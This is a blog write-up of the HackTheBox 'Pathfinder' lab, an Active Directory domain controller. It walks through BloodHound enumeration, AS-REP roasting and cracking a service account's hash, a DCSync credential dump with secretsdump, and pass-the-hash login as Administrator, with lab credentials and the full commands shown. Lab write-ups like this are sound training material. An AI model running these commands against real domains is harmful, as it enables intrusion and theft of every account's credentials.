HackTheBox-Pathfinder

ARZ101
5 min readMay 9, 2021

Hello everyone I hope you are doing well , in this post I will be sharing my writeup for the “Very Easy” Windows Active Directory machine on HackTheBox , it is meant for beginners with no points but still I faced a lot of difficulties in getting the administrator account so let’s jump in.

Rustscan

rustscan -a 10.10.10.30 -- -A -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
Open 10.10.10.30:53
Open 10.10.10.30:88
Open 10.10.10.30:135
Open 10.10.10.30:139
Open 10.10.10.30:389
Open 10.10.10.30:445
Open 10.10.10.30:464
Open 10.10.10.30:593
Open 10.10.10.30:636
Open 10.10.10.30:3268
Open 10.10.10.30:3269
Open 10.10.10.30:5985
Open 10.10.10.30:9389
PORT STATE SERVICE REASON VERSION
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-09 07:40:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing

PORT 139/445 (SMB)

We check for smb share if there are any

Let’s test for brute forcing any user name

We didn’t get anything out of it but found host name PATHFINDER, so let's move on to a different port

PORT 389 (LDAP)

We will be using Python based ingestor for BloodHound,by specifying the username and password sandra:Password1234! which I don't know where I could find them , in the official writeups it was referenced to be found from a previous machine which they didn't mention so I am going to use these credentials to authenticate when using this python tool

python3 bloodhound.py -d 'megacorp.local' -u 'sandra' -p 'Password1234!' -gc 'pathfinder.megacorp.local' -c all -ns 10.10.10.30

Let’s break down the arguments here

-d — -> This is for specifying domain name in this case we have a domain megacorp.local which can be seen from nmap scan

-u — -> This is for specifying a username -p — -> This is for specifying a password -gc — -> This is for specifying name of the host which is pathfinder which we have seen when we were trying to use crackmapexec to brute force users

-c — -> This is for collection method and we set this to all which will try to dump information regarding roup, LocalAdmin, Session, Trusts, Default (all previous),DCOnly (no computer connections), DCOM, RDP,PSRemote, LoggedOn, ObjectProps, ACL, All (all except LoggedOn)

-ns — -> This is for specifying the name server in this case it is the machine IP

We now have these json files

Let’s start neo4j and bloodhound and import these files into it

Create an archive for this json files

Drag and drop the archive into the bloodhound GUI. Run the query of Find All Domain Admins

Run the query of Find All kerberoastable Accounts

Run query of Find Path to kerberoastable Accounts

So from running these queries we know that service account SVC_BES is kerberoastable, let's run the python script GetNPUsers.py from Impacket

Now running with -request parameter we can get a TGT hash

Going to hashcat examples we can see what type of hash is this

So we are going to use hashcat to crack the hash

Now we have cracked the kerberoast hash since winrm port (5985) is open we can use evil-winrm to login with the new credentials

Now here let’s look the result of our loot from bloodhound by running the DCsync query which will allow us to dump hashes from NTDS.dit which holds the passwords for all acounts in AD

We can see the user which we kerberoasted has privileges for GetChangesAll which means we can request for replication for NTDS.dit

Using secretsdump.py for dumping hashes from NTDS.dit

./secretsdump.py 'MEGACORP.LOCAL/svc_bes':'Sheffield19'@10.10.10.30 -just-dc-ntlm

We have the hashes and we don’t need to crack these hash we can use psexec.py or evil-wirm to authenticate our selves

python psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes 'aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18'

--

--